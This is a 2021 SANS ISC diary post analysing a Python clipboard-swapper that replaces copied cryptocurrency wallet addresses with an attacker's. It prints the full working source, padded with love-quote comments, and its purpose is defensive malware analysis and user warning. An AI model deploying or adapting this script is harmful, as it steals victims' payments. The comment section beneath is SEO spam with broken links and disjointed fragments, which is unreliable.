Cryptocurrency Clipboard Swapper Delivered With Love

Published: 2021-08-30
Last Updated: 2021-08-30 13:44:30 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Be careful if you're a user of cryptocurrencies. My goal is not to re-open a debate about them and their associated financial risks. No, I'm talking here about technical risk. Wallet addresses are long strings of characters that are pretty impossible to use manually. It means that you'll use your clipboard to copy/paste your wallets to perform payments. But some malware monitors your clipboard for "interesting data" (like wallet addresses) and tries to replace it with another one. If you perform a payment operation, it means that you will transfer some BTC or XMR to the wrong wallet, owned by the attacker.

Yesterday, I spotted a simple malicious Python script that performs exactly this.The script SHA256 is ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343 and has a current score of 17/57[1]. The main code is obfusctated in a Base64-encode variable.

As you can see in the code below, this script is delivered with love to the victim! Random love quotes are added in the script to defeat some automated analysis. The script is based on the pyperclip[2] library that is common in the Python ecosystem. It allows manipulating the clipboard. The fact that the script does not test if the module is already installed makes me think that this script is part of a framework or has dependencies with others.

The clipboard is controlled at regular intervals and searched for classic cryptocurrencies through regular expressions. If there is a match, the clipboard content is swapped with a rogue wallet. Two are two defined in this sample.

Here is the code:

#If I know what love is
import pyperclip
#I fell in love with her courage
import json
#If you live to be a hundred
import time
#A man is already halfway in love
import re
#Women are meant to be loved
import argparse
#You make me want to be a better man
from datetime import datetime
#Thinking of you keeps me

def main():
    # infinite keeps me
    while 1:
        now = datetime.now()
        
        time.sleep(2)  #Let me love you
        #There is never a time or place for true love
        user_clipboard = pyperclip.paste()
        #true love
        crypto_found = spiff(
            user_clipboard
        )  
        replacement_address = replace(
            user_clipboard, crypto_found
        )  
#love is so short, forgetting is so long
        
master_addresses = {
  "btc": "xxxxxxxxxx",
  "xmr": "null",
  "eth": "xxxxxxxxxx",
  "dash": "null",
  "xrp": "null",
  "doge": "null",
  "ada": "null",
  "lite": "null",
  "dot": "null",
  "tron": "null"
}
#cares and fears
def replace(user_clipboard, crypto_found):

    if crypto_found != 0 and master_addresses[crypto_found] != "null":
        pyperclip.copy(master_addresses[crypto_found])
        return str(master_addresses[crypto_found])
    return 0
#until love’s vulnerable

def spiff(user_clipboard):
    crypto_regex_match = {
        "btc": "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$",
        "xmr": "4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}",
        "eth": "^0x[a-fA-F0-9]{40}$",
        "dash": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
        "xrp": "^r[0-9a-zA-Z]{24,34}$",
        "doge": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
        "ada": "^D[A-NP-Za-km-z1-9]{35,}$",
        "lite": "^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        "tron": "^T[a-zA-Z0-9]{33}$",
        "dot": "^[1-9A-HJ-NP-Za-km-z]*$",
    }
    #I love you without knowing how
    for k, v in crypto_regex_match.items():
        if bool(re.search(v, user_clipboard)):
            return str(k)

    return 0
    #A purpose of human life

main()
#Love is always patient and kind

I checked the two wallets in the script but then don't show any transaction at this time.

[Update 1]

Brian Krebs contacted me to report a story he posted a few days ago about a real case of such a clipboard swapping technique[3]. This article is worth reading!

[1] https://www.virustotal.com/gui/file/ab1ef55c9e4266e5a2b0870deefb609d3fa9d2c0ee8e0d34a2d7c080c84ca343/detection
[2] https://pypi.org/project/pyperclip/
[3] https://krebsonsecurity.com/2021/08/man-robbed-of-16-bitcoin-sues-young-thieves-parents/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Monday, August 30th, 2021 https://isc.sans.edu/podcastdetail.html?id=7650

Comments

What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
https://defineprogramming.com/
https://defineprogramming.com/
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
Enter corthrthmment here...

Diary Archives